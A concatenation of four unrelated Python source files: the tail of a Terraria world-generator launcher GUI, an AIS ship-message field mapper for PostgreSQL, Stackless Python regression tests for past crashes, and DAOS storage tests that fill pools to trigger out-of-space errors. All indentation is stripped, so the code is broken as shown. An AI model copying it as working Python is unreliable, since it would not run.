"http://forums.terraria.org/index.php?threads/game-launcher-3-2-1-5.1061/"),
])
forbidden = ["flatworld", "planetoids", "worldify", "arena"]
for plug in plugins_:
if plug[0] not in forbidden and plug[2] != "injector":
data.append(("Plugins/%s" % plug[1], start_proc, (relay_launch_plugin, [plug[1], plug])))
os.environ["SDL_VIDEO_WINDOW_POS"] = "20,50"
app.connect(gui.QUIT, exit_prog, None)
main = gui.Table()
menu = gui.Menus(data)
main.td(gui.Spacer(pad, pad))
main.td(menu, colspan=5, align=-1)
main.td(gui.Spacer(pad, pad))
main.tr()
update = gui.Table()
update.td(gui.Label(""))
main.td(update, col=1, colspan=5, align=-1)
main.tr()
width = 190
worldify = GenButton(lang.worldify, IMAGE, width=width)
planetoids = GenButton(lang.planetoids, PLANET, width=width)
dungeon = GenButton(lang.arena, DUNGEON, width=width)
flat = GenButton(lang.flat, FLAT, width=width)
tuple(t.join() for t in ts)
expected_h = 170 * len(worlds) // cache["columns"] + 100
pygame.display.init()
available_h = max([res[1] for res in pygame.display.list_modes()])
if expected_h > available_h:
print("GUI expected to be higher than monitor height, adding columns")
cache["columns"] = max(cache["columns"] + 1, 1 + (170 * len(worlds)) // (available_h - 100))
del (ts)
newworldtable = gui.Table()
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(gui.Label(lang.new), align=-1)
newworldtable.tr()
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(worldify)
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(planetoids)
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(dungeon)
newworldtable.td(gui.Spacer(10, 10))
newworldtable.td(flat)
newworldtable.tr()
newworldtable.td(gui.Spacer(10, 10))
main.td(newworldtable, colspan=6)
main.tr()
worldtable = gui.Table()
main.td(worldtable, colspan=6)
def display_worlds(optionchange=False):
worldtable.clear()
x = 0
for w in worlds:
if x % cache["columns"] == 0:
worldtable.tr()
wtab = gui.Table()
wtab.td(w.info, colspan=2)
wtab.tr()
if thumbsize:
wtab.td(w.image, colspan=2)
else:
wtab.td(gui.Spacer(1, 20))
wtab.tr()
wtab.td(gui.Spacer(pad, pad))
wtab.tr()
wtab.td(gui.Spacer(420, 25), colspan=2)
wtab.tr()
worldtable.td(gui.Spacer(pad, 1))
worldtable.td(wtab)
x += 1
if x % cache["columns"] == 0:
worldtable.tr()
worldtable.td(gui.Spacer(12, 12))
if app.widget:
print("Window Reset!")
app.resize()
app.repaint()
size = pygame.display.get_surface().get_size()
data = {"size": size, "w": size[0], "h": size[1], "reload": True if optionchange else False}
pygame.event.post(pygame.event.Event(pygame.VIDEORESIZE, data))
display_worlds()
print("GUI Matrix created, initializing..")
pygame.display.quit()
pygame.display.init()
pygame.display.set_caption("Terraria Omnitool V%s | %d Bit" % (__version__.__repr__(), bit))
def make_resize(worlds, app, main):
def resize(self, ev):
if app.first and not app.zoomed:
app.first = False
else:
padding = 50
if hasattr(ev, "reload") and ev.reload == True:
thumb_w, thumb_h = cache["thumbsize"]
for w in worlds:
w.override_thumb((thumb_w, thumb_h))
w.info.style.width = thumb_w
w.thumbsize = (thumb_w, thumb_h)
else:
thumb_w = max((ev.w - padding) // cache["columns"], 420)
thumb_h = int(thumb_w / 3.5)
for w in worlds:
w.override_thumb((thumb_w, thumb_h))
w.info.style.width = thumb_w
w.thumbsize = (thumb_w, thumb_h)
app.rect.size = main.rect.size = main.w, main.h = main.resize()
if sys.platform.startswith("win"):
if windll.user32.IsZoomed(pygame.display.get_wm_info()['window']):
s = pygame.display.set_mode(ev.size, pygame.RESIZABLE)
app.rect.size = pygame.display.get_surface().get_size()
app.zoomed = True
else:
s = pygame.display.set_mode((main.w, main.h), pygame.RESIZABLE)
app.zoomed = False
else:
s = pygame.display.set_mode((main.w, main.h), pygame.RESIZABLE)
app.zoomed = False
app.screen = s
app.first = True
return resize
app.on_resize = make_resize(worlds, app, main)
app.init(main, None)
main.rect.h = max(main.rect.height, 250)
if cache["thumbsize"]:
pygame.display.set_mode((main.rect.size[0] - 2, main.rect.size[1] - 2), pygame.SWSURFACE | pygame.RESIZABLE)
else:
pygame.display.set_mode(main.rect.size, pygame.SWSURFACE)
info = Info()
info.name = "Info"
info.daemon = False
updater = Updater(update)
updater.daemon = False
if cache["do_backup"]:
b = Backupper()
b.name = "Backup"
b.start()
redrawer = Redrawer()
redrawer.start()
info.start()
updater.start()
app.run(main)
PLANET = 1
DUNGEON = 2
FLAT = 3
IMAGE = 4
from .relay import run_plat, run_arena, run_flat, run_world
bind = {1: (run_plat, "Planetoids"),
2: (run_arena, "Arena"),
3: (run_flat, "Flatworld"),
4: (run_world, "Worldify")}
|
functions.py
|
from src import postgresql as pgs
# Threading not implemented in these functions due to the
# amount of threads spawned for each implementation,
# easier when done single threaded
# process the message depending on type
def more_processing(result):
if (result['id'] == 1) or (result['id'] == 2) or (result['id'] == 3):
location_data = modify_location(result)
pgs.save_location(location_data)
pgs.update_identity_from_location(location_data)
# Thread(target=pgs.save_location, args=(location_data,)).start()
# Thread(target=pgs.update_identity_from_location, args=(location_data,)).start()
elif result['id'] == 4:
station_data = modify_station(result)
pgs.save_stations(station_data)
elif result['id'] == 5:
identity_data = modify_info(result)
pgs.save_message5(identity_data)
# change the values of the dict to database style values.
def modify_station(data):
data['lat'] = data.pop('y')
data['lng'] = data.pop('x')
data['accuracy'] = data.pop('position_accuracy')
data['epfd'] = data.pop('fix_type')
del data['slot_timeout'], data['spare'], data['repeat_indicator']
del data['transmission_ctl'], data['sync_state'], data['id']
return data
# change the values of dict to database style values
def modify_info(data):
data['mmsi'] = data.pop('mmsi')
data['imo_number'] = data.pop('imo_num')
data['call_sign'] = data.pop('callsign')
data['ship_type'] = data.pop('type_and_cargo')
data['dimension_to_bow'] = data.pop('dim_a')
data['dimension_to_stern'] = data.pop('dim_b')
data['dimension_to_port'] = data.pop('dim_c')
data['dimension_to_starboard'] = data.pop('dim_d')
data['position_fix_type'] = data.pop('fix_type')
data['vessel_name'] = data.pop('name')
del data['id'], data['spare'], data['ais_version']
del data['dte'], data['repeat_indicator']
return data
# change the values of the dict to database style values
def modify_location(data):
data['lat'] = data.pop('y')
data['lng'] = data.pop('x')
data['speed'] = data.pop('sog')
data['accuracy'] = data.pop('position_accuracy')
data['true_heading'] = data.pop('true_heading')
data['turn'] = data.pop('rot')
data['course'] = data.pop('cog')
data['time_stamp'] = data.pop('timestamp')
del data['repeat_indicator'], data['rot_over_range']
del data['sync_state'], data['spare'], data['id'], data['raim']
return data
|
test_defects.py
|
from __future__ import print_function, absolute_import, division
import unittest
import stackless
import gc
import sys
import types
from io import BytesIO
import time
try:
import threading
withThreads = True
except:
withThreads = False
from stackless import _test_nostacklesscall as apply_not_stackless
from support import test_main # @UnusedImport
from support import (StacklessTestCase, captured_stderr, require_one_thread,
get_reduce_frame)
"""
Various regression tests for stackless defects.
Typically, one can start by adding a test here, then fix it.
Don't check in tests for un-fixed defects unless they are disabled (by adding a leading _)
"""
class TestTaskletDel(StacklessTestCase):
# Defect: If a tasklet's tempval contains any non-trivial __del__ function, it will cause
# an assertion in debug mode due to violation of the stackless protocol.
# The return value of the tasklet's function is stored in the tasklet's tempval and cleared
# when the tasklet exits.
# Also, the tasklet itself would have problems with a __del__ method.
class ObjWithDel:
def __del__(self):
self.called_func()
def called_func(self):
pass # destructor must call a function
class TaskletWithDel(stackless.tasklet):
def __del__(self):
self.func()
def func(self):
pass
class TaskletWithDelAndCollect(stackless.tasklet):
def __del__(self):
gc.collect()
def BlockingReceive(self):
# Function to block when run in a tasklet.
def f():
# must store c in locals
c = stackless.channel()
c.receive()
return stackless.tasklet(f)()
# Test that a tasklet tempval's __del__ operator works.
def testTempval(self):
def TaskletFunc(self):
return self.ObjWithDel()
stackless.tasklet(TaskletFunc)(self)
stackless.run()
# Test that a tasklet's __del__ operator works.
def testTasklet(self):
def TaskletFunc(self):
pass
self.TaskletWithDel(TaskletFunc)(self)
stackless.run()
# a gc.collect() in a tasklet's __del__ method causes
def testCrash1(self):
# we need a lost blocked tasklet here (print the ids for debugging)
hex(id(self.BlockingReceive()))
gc.collect() # so that there isn't any garbage
stackless.run()
def TaskletFunc(self):
pass
hex(id(self.TaskletWithDelAndCollect(TaskletFunc)(self)))
stackless.run() # crash here
@unittest.skipUnless(withThreads, "requires thread support")
def test_tasklet_dealloc_in_thread_shutdown(self):
# Test for https://bitbucket.org/stackless-dev/stackless/issues/89
def other_thread_main():
# print("other thread started")
self.assertIs(stackless.main, stackless.current)
tasklet2 = stackless.tasklet(apply_not_stackless)(stackless.main.run,)
# print("OT Main:", stackless.main)
# print("OT tasklet2:", tasklet2)
tasklet2.run()
self.assertTrue(tasklet2.scheduled)
self.other_thread_started = True
# the crash from issue #89 happened during the shutdown of other thread
self.other_thread_started = False
self.assertIs(stackless.main, stackless.current)
# print("Main Thread:", stackless.main)
t = threading.Thread(target=other_thread_main, name="other thread")
t.start()
t.join()
self.assertTrue(self.other_thread_started)
# print("OK")
class Schedule(StacklessTestCase):
def testScheduleRemove(self):
# schedule remove doesn't work if it is the only tasklet running under watchdog
def func(self):
stackless.schedule_remove()
self.fail("We shouldn't be here")
stackless.run() # flush all runnables
t = stackless.tasklet(func)(self)
stackless.run()
t.kill() # avoid a resource leak caused by an uncollectable tasklet
@require_one_thread
def testScheduleRemove2(self):
# schedule remove doesn't work if it is the only tasklet with main blocked
# main tasklet is blocked, this should raise an error
def func(self, chan):
self.assertRaises(RuntimeError, stackless.schedule_remove)
chan.send(None)
stackless.run() # flush all runnables
chan = stackless.channel()
stackless.tasklet(func)(self, chan)
chan.receive()
def testScheduleRemove3(self):
'''Schedule-remove the last reference to a tasklet 1'''
def func():
stackless.schedule_remove(None)
stackless.tasklet(func)()
stackless.run()
def testScheduleRemove4(self):
'''Schedule-remove the last reference to a tasklet 2'''
def func():
stackless.schedule_remove(None)
stackless.tasklet(func)()
stackless.schedule_remove(None)
class Channel(StacklessTestCase):
def testTemporaryChannel(self):
def f1():
stackless.channel().receive()
stackless.tasklet(f1)()
old = stackless.enable_softswitch(True)
try:
stackless.run()
finally:
stackless.enable_softswitch(old)
def testTemporaryChannel2(self):
def f1():
stackless.channel().receive()
def f2():
pass
stackless.tasklet(f1)()
stackless.tasklet(f2)()
old = stackless.enable_softswitch(True)
try:
stackless.run()
finally:
stackless.enable_softswitch(old)
class TestInfiniteRecursion(StacklessTestCase):
# test for http://www.stackless.com/ticket/20
def testDirectRecursion(self):
class A(object):
# define __call__ in case http://www.stackless.com/ticket/18 is not fixed
def __call__(self):
pass
A.__call__ = A()
a = A()
# might crash the Python(r) interpreter, if the recursion check does not kick in
self.assertRaises(RuntimeError, a)
def testIndirectDirectRecursion(self):
class A(object):
def __call__(self):
pass
class B(object):
def __call__(self):
pass
A.__call__ = B()
B.__call__ = A()
a = A()
self.assertRaises(RuntimeError, a)
class TestExceptionInScheduleCallback(StacklessTestCase):
# Problem
# Assertion failed: ts->st.current == NULL, file ..\Stackless\module\taskletobject.c, line 51
# See https://bitbucket.org/stackless-dev/stackless/issue/38
def scheduleCallback(self, prev, next):
if next.is_main:
raise RuntimeError("scheduleCallback")
def testExceptionInScheduleCallback(self):
stackless.set_schedule_callback(self.scheduleCallback)
self.addCleanup(stackless.set_schedule_callback, None)
stackless.tasklet(lambda: None)()
with captured_stderr() as stderr:
stackless.run()
self.assertTrue("scheduleCallback" in stderr.getvalue())
class TestCrashUponFrameUnpickling(StacklessTestCase):
def testCrasher(self):
import pickle
frame = sys._getframe()
frameType = type(frame)
while frame and frame.f_back:
frame = frame.f_back
frame = get_reduce_frame()(frame)
p = pickle.dumps(frame, -1)
frame = None
frame = pickle.loads(p)
self.assertIsInstance(frame, frameType)
# this access crashes Stackless versions released before Feb 2nd 2014
f_back = frame.f_back
self.assertIsNone(f_back)
def testMissingLocalsplusCrasher(self):
# A test case for issue #61 https://bitbucket.org/stackless-dev/stackless/issue/61
#
# Some versions of stackless create pickles of frames with the localsplus tuple set to None.
# This test creates a frame with localsplus=None and ensures that Python does not crash upon
# accessing frame.f_locals
def reduce_current():
result = []
def func(current):
result.append(stackless._wrap.frame.__reduce__(current.frame))
stackless.tasklet().bind(func, (stackless.current,)).run()
return result[0]
func, args, state = reduce_current()
# state is a tuple of the form
# ('f_code', 'valid', 'exec_name', 'f_globals', 'have_locals',
# 'f_locals', 'f_trace', 'f_lasti', 'f_lineno',
# 'blockstack_as_tuple', 'localsplus_as_tuple')
self.assertEqual(len(state), 11)
state = list(state)
# set valid=0, localsplus_as_tuple=None
state[1] = 0
state[-1] = None
state = tuple(state)
# create the frame
frame = func(*args)
frame.__setstate__(state)
self.assertIsInstance(frame, types.FrameType)
# this access crashes Stackless versions released before May 20th 2014
f_locals = frame.f_locals
self.assertIsInstance(f_locals, dict)
class TestShutdown(StacklessTestCase):
def test_cstack_new(self):
# test for issue #80 https://bitbucket.org/stackless-dev/stackless/issues/80/
import subprocess
rc = subprocess.call([sys.executable, "-s", "-S", "-E", "-c", """if 1:
import stackless, sys
from stackless import _test_nostacklesscall as apply_not_stackless
def func():
global channel
assert stackless.current.nesting_level == 0
assert apply_not_stackless(lambda : stackless.current.nesting_level) == 1, "apply_not_stackless does not recurse"
apply_not_stackless(channel.receive) # crash at nesting level 1
channel = stackless.channel()
task = stackless.tasklet().bind(func, ()) # simplest tasklet
task.run()
sys.exit(42)
"""])
self.assertEqual(rc, 42)
@unittest.skipUnless(withThreads, "requires thread support")
def test_interthread_kill(self):
# test for issue #87 https://bitbucket.org/stackless-dev/stackless/issues/87/
import subprocess
rc = subprocess.call([sys.executable, "-s", "-S", "-E", "-c", """from __future__ import print_function, absolute_import\nif 1:
import sys
import _thread as thread
import stackless
import os
import time
from stackless import _test_nostacklesscall as apply_not_stackless
# This lock is used as a simple event variable.
ready = thread.allocate_lock()
ready.acquire()
if False: # change to True to enable debug messages
sys.stdout = sys.stderr # C-assert messages go to STDERR
else:
def print(*args):
pass
# Module globals are cleared before __del__ is run
# So we save functions, objects, ... in a class dict.
class C(object):
time_sleep = time.sleep
def other_thread_main(self):
print("other thread started")
assert stackless.main.nesting_level == 0
self.main = stackless.main
assert stackless.main is stackless.current
t1 = stackless.tasklet(apply_not_stackless)(self.main.switch)
t1.run()
assert t1.paused
assert t1.nesting_level == 1
print("OT-Main:", self.main)
print("OT-t1:", t1)
try:
ready.release()
while True:
self.main.run()
except TaskletExit:
self.time_sleep(999999)
print("Main-Thread:", stackless.current)
x = C()
thread.start_new_thread(x.other_thread_main, ())
ready.acquire() # Be sure the other thread is waiting.
x.main.kill()
time.sleep(0.5) # give other thread time to run
# state is now: other thread has 2 tasklets:
# - main tasklet is stackless and blocked in sleep(999999)
# - t1 has a C-state and is paused
print("at end")
sys.stdout.flush()
sys.exit(42)
"""])
self.assertEqual(rc, 42)
@unittest.skipUnless(withThreads, "requires thread support")
def test_tasklet_end_with_wrong_recursion_level(self):
# test for issue #91 https://bitbucket.org/stackless-dev/stackless/issues/91/
"""A test for issue #91, wrong recursion level after tasklet re-binding
Assertion failed: ts->recursion_depth == 0 || (ts->st.main == NULL && prev == next), file ../Stackless/module/scheduling.c, line 1291
The assertion fails with ts->recursion_depth > 0
It is in function
static int schedule_task_destruct(PyObject **retval, PyTaskletObject *prev, PyTaskletObject *next):
assert(ts->recursion_depth == 0 || (ts->st.main == NULL && prev == next));
During thread shutdown in slp_kill_tasks_with_stacks() kills tasklet tlet after the main
tasklet of other thread ended. To do so, it creates a new temporary main tasklet. The
assertion failure happens during the end of the killed tasklet.
"""
self.skipUnlessSoftswitching()
if True:
def print(*args):
pass
def tlet_inner():
assert stackless.current.recursion_depth >= 2, "wrong recursion depth: %d" % (stackless.current.recursion_depth,)
stackless.main.switch()
def tlet_outer():
tlet_inner()
def other_thread_main():
self.tlet = stackless.tasklet(tlet_outer)()
self.assertEqual(self.tlet.recursion_depth, 0)
print("Other thread main", stackless.main)
print("Other thread paused", self.tlet)
self.tlet.run()
self.assertGreaterEqual(self.tlet.recursion_depth, 2)
self.tlet.bind(lambda: None, ()) # requires soft switching
self.assertEqual(self.tlet.recursion_depth, 0)
# before issue #91 got fixed, the assertion violation occurred here
print("Main thread", stackless.current)
t = threading.Thread(target=other_thread_main, name="other thread")
t.start()
print("OK")
t.join()
print("Done")
class TestStacklessProtokoll(StacklessTestCase):
"""Various tests for violations of the STACKLESS_GETARG() STACKLESS_ASSERT() protocol
See https://bitbucket.org/stackless-dev/stackless/issues/84
"""
def test_invalid_args_channel_next(self):
"""test of typeobject.c wrap_next(...)"""
func = stackless.channel().__next__
# func(None) causes the crash
self.assertRaises(TypeError, func, None)
def test_invalid_args_tasklet_kill(self):
func = stackless.tasklet().kill
# func(False, None) causes the crash
self.assertRaises(TypeError, func, False, None)
class TestCPickleBombHandling_Dict(dict):
pass
class TestCPickleBombHandling_Cls(object):
def __getstate__(self):
try:
started = self.started
except AttributeError:
pass
else:
self.started = None
started.set()
# print("started")
time.sleep(0.05) # give the other thread a chance to run
return self.__dict__
class TestCPickleBombHandling(StacklessTestCase):
def other_thread(self, pickler, c):
try:
pickler.dump(c)
except TaskletExit:
self.killed = None
except:
self.killed = sys.exc_info()
else:
self.killed = False
@unittest.skipUnless(withThreads, "requires thread support")
def test_kill_during_cPickle_stack_switch(self):
# this test kills the main/current tasklet of a other-thread,
# which is fast-pickling a recursive structure. This leads to an
# infinite recursion, which gets interrupted by a bomb thrown from
# main-thread. Until issue #98 got fixed, this caused a crash.
# See https://bitbucket.org/stackless-dev/stackless/issues/98
buf = BytesIO()
import _pickle as pickle
pickler = pickle.Pickler(buf, protocol=-1)
pickler.fast = 1
started = threading.Event()
c = TestCPickleBombHandling_Cls()
c.started = started
d = TestCPickleBombHandling_Dict()
d[1] = d
c.recursive = d
self.killed = "undefined"
t = threading.Thread(target=self.other_thread, name="other_thread", args=(pickler, c))
t.start()
started.wait()
stackless.get_thread_info(t.ident)[0].kill(pending=True)
# print("killing")
t.join()
if isinstance(self.killed, tuple):
raise (self.killed[0], self.killed[1], self.killed[2])
self.assertIsNone(self.killed)
class TestFrameClear(StacklessTestCase):
def test_frame_clear(self):
# a test for Stackless issue #66
# https://bitbucket.org/stackless-dev/stackless/issues/66
def generator():
yield None
geniter = generator()
frame = geniter.gi_frame
frame.clear() # causes the failure
class TestContextManager(StacklessTestCase):
def test_crash_on_WHY_SILENCED(self):
current_switch = stackless.current.switch
steps = []
class CtxManager:
def __enter__(self):
steps.append(2)
def __exit__(self, exc_type, exc_val, exc_tb):
steps.append(4)
current_switch() # causes a stack corruption upon resuming __exit__
steps.append(5)
return True # silence the exception
def task():
try:
steps.append(1)
return "OK"
finally:
with CtxManager():
steps.append(3)
1 // 0
steps.append(6)
# Stackless issue #115 ()
# Leaving this finally block crashes Python,
# because the interpreter stack is corrupt.
t = stackless.tasklet(task)()
t.run()
self.assertListEqual(steps, [1, 2, 3, 4])
t.run()
r = t.tempval
self.assertListEqual(steps, [1, 2, 3, 4, 5, 6])
class TestUnwinding(StacklessTestCase):
# a test case for https://bitbucket.org/stackless-dev/stackless/issues/119
# The macros STACKLESS_PACK(retval) / STACKLESS_UNPACK(retval) are not thread
# safe. And thread switching can occur, if a destructor runs during stack unwinding.
def test_interpreter_recursion(self):
# This test calls pure Python-functions during unwinding.
# The test ensures, that a recursively invoked interpreter does not
# unwind the stack, while a higher level interpreter unwinds the stack.
self.skipUnlessSoftswitching()
def inner_detector():
pass
class Detector(object):
def __del__(self):
# print("__del__, going to sleep", file=sys.stderr)
inner_detector()
def inner_func():
return 4711
def func():
return inner_func()
func.detector = Detector()
get_func = [func].pop
del func
# there is only one reference to func.
# print("going to call func", file=sys.stderr)
# call func and release the last reference to func. This way
# Detector.__del__ runs during stack unwinding.
# Until STACKLESS_PACK(retval) / STACKLESS_UNPACK(retval) becomes
# thread safe, this raises SystemError or crashes with an assertion
# failure.
r = get_func()()
# print("called func", file=sys.stderr)
self.assertEqual(r, 4711)
@unittest.skipUnless(withThreads, "requires thread support")
def test_concurrent_unwinding(self):
# This test switches tasks during unwinding. The other tasks performs stackless
# calls too. This test ensures, that the STACKLESS_PACK() / STACKLESS_UNPACK()
# mechanism is thread safe.
self.skipUnlessSoftswitching()
terminate = False
started = threading.Event()
go = threading.Event()
def other_thread_inner():
started.set()
self.assertEqual(stackless.current.nesting_level, 0)
def other_thread():
"""A thread, that repeatedly calls other_thread_inner() at nesting level 0.
"""
while not terminate:
other_thread_inner()
go.wait() # used to start in a defined state
class Detector(object):
def __del__(self):
# print("__del__, going to sleep", file=sys.stderr)
go.set() # make other_thread runnable
time.sleep(0.1) # release GIL
# print("__del__, sleep done", file=sys.stderr)
pass
def inner_func():
return 4711
def func():
return inner_func()
t = threading.Thread(target=other_thread, name="other_thread")
t.start()
started.wait()
time.sleep(0.05) # give othere_thread time to reach go.wait()
func.detector = Detector()
get_func = [func].pop
del func
# there is only one reference to func.
# print("going to call func", file=sys.stderr)
try:
# call func and release the last reference to func. This way
# Detector.__del__ runs during stack unwinding.
# Until STACKLESS_PACK(retval) / STACKLESS_UNPACK(retval) becomes
# thread safe, this raises SystemError or crashes with an assertion
# failure.
r = get_func()()
finally:
# make sure, that other_thread terminates
terminate = True
go.set() # just in case Detector.__del__() does not run
t.join(.5)
# print("called func", file=sys.stderr)
self.assertEqual(r, 4711)
if __name__ == '__main__':
if not sys.argv[1:]:
sys.argv.append('-v')
unittest.main()
|
enospace.py
|
#!/usr/bin/python
'''
(C) Copyright 2020-2022 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
'''
import time
import threading
from apricot import skipForTicket
from nvme_utils import ServerFillUp
from avocado.core.exceptions import TestFail
from daos_utils import DaosCommand
from job_manager_utils import get_job_manager
from ior_utils import IorCommand, IorMetrics
from exception_utils import CommandFailure
from general_utils import error_count
class NvmeEnospace(ServerFillUp):
# pylint: disable=too-many-ancestors
"""
Test Class Description: To validate DER_NOSPACE for SCM and NVMe
:avocado: recursive
"""
def __init__(self, *args, **kwargs):
"""Initialize a NvmeEnospace object."""
super().__init__(*args, **kwargs)
self.daos_cmd = None
def setUp(self):
"""Initial setup"""
super().setUp()
# initialize daos command
self.daos_cmd = DaosCommand(self.bin)
self.create_pool_max_size()
self.der_nospace_count = 0
self.other_errors_count = 0
self.test_result = []
def verify_enspace_log(self, der_nospace_err_count):
"""
Function to verify there are no other error except DER_NOSPACE and
DER_NO_HDL in client log.Verify DER_NOSPACE count is higher.
args:
expected_err_count(int): Expected DER_NOSPACE count from client log.
"""
#Get the DER_NOSPACE and other error count from log
self.der_nospace_count, self.other_errors_count = error_count(
"-1007", self.hostlist_clients, self.client_log)
#Get the DER_NO_HDL and other error count from log
der_nohdl_count, other_nohdl_err = error_count(
"-1002", self.hostlist_clients, self.client_log)
#Check there are no other errors in log file except DER_NO_HDL
if self.other_errors_count != der_nohdl_count:
self.fail('Found other errors, count {} in client log {}'
.format(int(self.other_errors_count-other_nohdl_err),
self.client_log))
#Check the DER_NOSPACE error count is higher if not test will FAIL
if self.der_nospace_count < der_nospace_err_count:
self.fail('Expected DER_NOSPACE should be > {} and Found {}'
.format(der_nospace_err_count, self.der_nospace_count))
def delete_all_containers(self):
"""
Delete all the containers.
"""
#List all the container
kwargs = {"pool": self.pool.uuid}
data = self.daos_cmd.container_list(**kwargs)
containers = [uuid_label["uuid"] for uuid_label in data["response"]]
#Destroy all the containers
for _cont in containers:
kwargs["cont"] = _cont
kwargs["force"] = True
self.daos_cmd.container_destroy(**kwargs)
def ior_bg_thread(self):
"""Start IOR Background thread, This will write small data set and
keep reading it in loop until it fails or main program exit.
"""
# Define the IOR Command and use the parameter from yaml file.
ior_bg_cmd = IorCommand()
ior_bg_cmd.get_params(self)
ior_bg_cmd.set_daos_params(self.server_group, self.pool)
ior_bg_cmd.dfs_oclass.update(self.ior_cmd.dfs_oclass.value)
ior_bg_cmd.api.update(self.ior_cmd.api.value)
ior_bg_cmd.transfer_size.update(self.ior_scm_xfersize)
ior_bg_cmd.block_size.update(self.ior_cmd.block_size.value)
ior_bg_cmd.flags.update(self.ior_cmd.flags.value)
ior_bg_cmd.test_file.update('/testfile_background')
# Define the job manager for the IOR command
job_manager = get_job_manager(self, "Mpirun", ior_bg_cmd, mpi_type="mpich")
# create container
container = self.get_container(self.pool)
job_manager.job.dfs_cont.update(container.uuid)
env = ior_bg_cmd.get_default_env(str(job_manager))
job_manager.assign_hosts(self.hostlist_clients, self.workdir, None)
job_manager.assign_processes(1)
job_manager.assign_environment(env, True)
print('----Run IOR in Background-------')
# run IOR Write Command
try:
job_manager.run()
except (CommandFailure, TestFail) as _error:
self.test_result.append("FAIL")
return
# run IOR Read Command in loop
ior_bg_cmd.flags.update(self.ior_read_flags)
while True:
try:
job_manager.run()
except (CommandFailure, TestFail) as _error:
break
def run_enospace_foreground(self):
"""
Function to run test and validate DER_ENOSPACE and expected storage size
"""
#Fill 75% more of SCM pool,Aggregation is Enabled so NVMe space will be
#start filling
print('Starting main IOR load')
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=75)
print(self.pool.pool_percentage_used())
#Fill 50% more of SCM pool,Aggregation is Enabled so NVMe space will be
#filled
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=50)
print(self.pool.pool_percentage_used())
#Fill 60% more of SCM pool, now NVMe will be Full so data will not be
#moved to NVMe but it will start filling SCM. SCM size will be going to
#full and this command expected to fail with DER_NOSPACE
try:
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=60)
self.fail('This test suppose to FAIL because of DER_NOSPACE'
'but it got Passed')
except TestFail as _error:
self.log.info('Test expected to fail because of DER_NOSPACE')
#Display the pool%
print(self.pool.pool_percentage_used())
#verify the DER_NO_SAPCE error count is expected and no other Error in
#client log
self.verify_enspace_log(self.der_nospace_count)
#Check both NVMe and SCM are full.
pool_usage = self.pool.pool_percentage_used()
#NVMe should be almost full if not test will fail.
if pool_usage['nvme'] > 8:
self.fail('Pool NVMe used percentage should be < 8%, instead {}'.
format(pool_usage['nvme']))
#For SCM some % space used for system so it won't be 100% full.
if pool_usage['scm'] > 50:
self.fail('Pool SCM used percentage should be < 50%, instead {}'.
format(pool_usage['scm']))
def run_enospace_with_bg_job(self):
"""
Function to run test and validate DER_ENOSPACE and expected storage
size. Single IOR job will run in background while space is filling.
"""
#Get the initial DER_ENOSPACE count
self.der_nospace_count, self.other_errors_count = error_count(
"-1007", self.hostlist_clients, self.client_log)
# Start the IOR Background thread which will write small data set and
# read in loop, until storage space is full.
job = threading.Thread(target=self.ior_bg_thread)
job.daemon = True
job.start()
#Run IOR in Foreground
self.run_enospace_foreground()
# Verify the background job result has no FAIL for any IOR run
for _result in self.test_result:
if "FAIL" in _result:
self.fail("One of the Background IOR job failed")
def test_enospace_lazy_with_bg(self):
"""Jira ID: DAOS-4756.
Test Description: IO gets DER_NOSPACE when SCM and NVMe is full with
default (lazy) Aggregation mode.
Use Case: This tests will create the pool and fill 75% of SCM size which
will trigger the aggregation because of space pressure,
next fill 75% more which should fill NVMe. Try to fill 60%
more and now SCM size will be full too.
verify that last IO fails with DER_NOSPACE and SCM/NVMe pool
capacity is full.One background IO job will be running
continuously.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_lazy,enospc_lazy_bg
"""
print(self.pool.pool_percentage_used())
#Run IOR to fill the pool.
self.run_enospace_with_bg_job()
def test_enospace_lazy_with_fg(self):
"""Jira ID: DAOS-4756.
Test Description: Fill up the system (default aggregation mode) and
delete all containers in loop, which should release
the space.
Use Case: This tests will create the pool and fill 75% of SCM size which
will trigger the aggregation because of space pressure,
next fill 75% more which should fill NVMe. Try to fill 60%
more and now SCM size will be full too.
verify that last IO fails with DER_NOSPACE and SCM/NVMe pool
capacity is full. Delete all the containers.
Do this in loop for 10 times and verify space is released.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_lazy,enospc_lazy_fg
"""
print(self.pool.pool_percentage_used())
#Repeat the test in loop.
for _loop in range(10):
print("-------enospc_lazy_fg Loop--------- {}".format(_loop))
#Run IOR to fill the pool.
self.run_enospace_foreground()
#Delete all the containers
self.delete_all_containers()
#Delete container will take some time to release the space
time.sleep(60)
#Run last IO
self.start_ior_load(storage='SCM', operation="Auto_Write", percent=1)
def test_enospace_time_with_bg(self):
"""Jira ID: DAOS-4756.
Test Description: IO gets DER_NOSPACE when SCM is full and it release
the size when container destroy with Aggregation
set on time mode.
Use Case: This tests will create the pool. Set Aggregation mode to Time.
Start filling 75% of SCM size. Aggregation will be triggered
time to time, next fill 75% more which will fill up NVMe.
Try to fill 60% more and now SCM size will be full too.
Verify last IO fails with DER_NOSPACE and SCM/NVMe pool
capacity is full.One background IO job will be running
continuously.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_time,enospc_time_bg
"""
print(self.pool.pool_percentage_used())
# Enabled TIme mode for Aggregation.
self.pool.set_property("reclaim", "time")
#Run IOR to fill the pool.
self.run_enospace_with_bg_job()
def test_enospace_time_with_fg(self):
"""Jira ID: DAOS-4756.
Test Description: Fill up the system (time aggregation mode) and
delete all containers in loop, which should release
the space.
Use Case: This tests will create the pool. Set Aggregation mode to Time.
Start filling 75% of SCM size. Aggregation will be triggered
time to time, next fill 75% more which will fill up NVMe.
Try to fill 60% more and now SCM size will be full too.
Verify last IO fails with DER_NOSPACE and SCM/NVMe pool
capacity is full. Delete all the containers.
Do this in loop for 10 times and verify space is released.
:avocado: tags=all,full_regression
:avocado: tags=hw,medium,ib2
:avocado: tags=nvme,der_enospace,enospc_time,enospc_time_fg
"""
print(self.pool.pool_percentage_used())
